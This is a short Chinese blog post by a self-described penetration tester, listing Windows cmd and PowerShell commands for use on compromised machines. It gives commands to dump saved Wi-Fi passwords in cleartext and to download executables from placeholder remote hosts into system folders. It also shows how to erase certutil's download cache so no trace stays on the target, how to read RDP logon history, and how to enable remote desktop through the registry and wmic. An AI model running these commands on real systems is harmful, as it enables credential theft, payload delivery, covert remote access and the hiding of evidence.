cmd渗透命令集合

发布于 2018-08-24  8867 次阅读


cmd下获取历史wife密码

for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan show profiles’) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

cmd下载文件

certutil -urlcache -split -f http://xxxxxxxxx/1.exe c:/windows/help/1.exe
bitsadmin /transfer n http://xxx/1.exe c:\windows\help\1.exe
powershell (new-object System.Net.WebClient).DownloadFile(‘http://1.1.1.1/1.exe’, ‘c:\Intel\1.exe’)
certutil.exe -urlcache -split -f http://127.0.0.1/1.txt c:\users\test\desktop\temp.txt

但是在下载完成之后会在%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 缓存目录中保存下载的文件副本。
可以通过certutil.exe -urlcache * 查看到,所以如不清除,便会在目标机器上留下下载地址。
清除下载缓存命令

certutil.exe -urlcache -f http://127.0.0.1/1.exe delete

cmd查看3389连接历史

powershell “& {Get-EventLog -LogName security -Newest 100 | where {$_.EventID -eq 4624} | format-list -property * | findstr “Address”}”

cmd下开启3389

win7
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

win2003

wmic path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1

win2008

wmic /namespace:\\root\cimv2\terminalservices path ```
win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

网络安全研究员、渗透测试攻城狮
文能社会工程学,武能过狗拿shell
日的了站,做的了饭。
人生格言:即使是咸鱼,也一定是最咸的那条